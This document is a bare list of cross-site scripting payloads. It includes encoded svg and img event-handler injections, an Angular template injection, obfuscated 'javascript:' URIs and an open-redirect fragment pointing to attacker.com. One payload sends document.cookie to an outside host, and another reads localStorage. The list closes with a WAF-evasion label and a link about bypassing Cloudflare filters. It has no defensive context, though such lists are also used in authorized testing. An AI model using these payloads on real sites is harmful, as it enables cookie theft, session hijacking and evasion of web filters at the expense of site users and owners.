%u003Csvg onload=alert(1)> \
%u3008svg onload=alert(2)> \
%uFF1Csvg onload=alert(3)> \
=<img%20src=x%20onerror=alert('Welcome,%20v
q=<g><script>alert%28document.domain%29<%2Fscript>   
<img src=x onerror=console.log("XSS")>   
‘);</script><script>alert(1)</script>  
{{a=toString().constructor.prototype;a.charAt=a.trim;$eval('a,alert(1),a')}}
";(a=alert,b=1,a(b))// ( 200 OK )
<img/src=x onError="`${x}`;alert(`Ex.Mi`);">
"><U>test123';alert();//
test 345 <img src=x onerror=alert(2)>
123" onload=alert();//"test123
%2f%09%2fattacker.com
"><script>alert(localStorage.getItem(' key_name'))</script>
User-Agent:<script>alert(document.cookie)</script>

java%0d%0ascript%0d%0a:alert(0)
j%0d%0aava%0d%0aas%0d%0acrip%0d%0at%0d%0a:confirm`0`
java%07script:prompt`0`
java%09scrip%07t:prompt`0`
jjavascriptajavascriptvjavascriptajavascriptsjavascriptcjavascriptrjavascriptijavascript
pjavascriptt:confirm`0`

"><iMg SrC="x" oNeRRor="alert(1);">

"><xss/id="1"/tabindex="1"/style="font-size:%20100px"/autofocus/onfocusin="confirm%601%60">
"><xss/id="1"/tabindex="1"/style="font-size:%20100px"/autofocus/onfocusin="window.location.href='https://example.com?cookie='%2bdocument.cookie">
<xss/contenteditable/autofocus/onfocus="">

?s=%22%2F%3E%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E

<svg><animate xlink:href=#x attributeName=href values=&#106;avascript:alert(1) /><a id=x><rect width=100 height=100 /></a>

evasionwaf
https://0xjin.medium.com/new-xss-bypass-cloudflare-filters-2a878c01d312

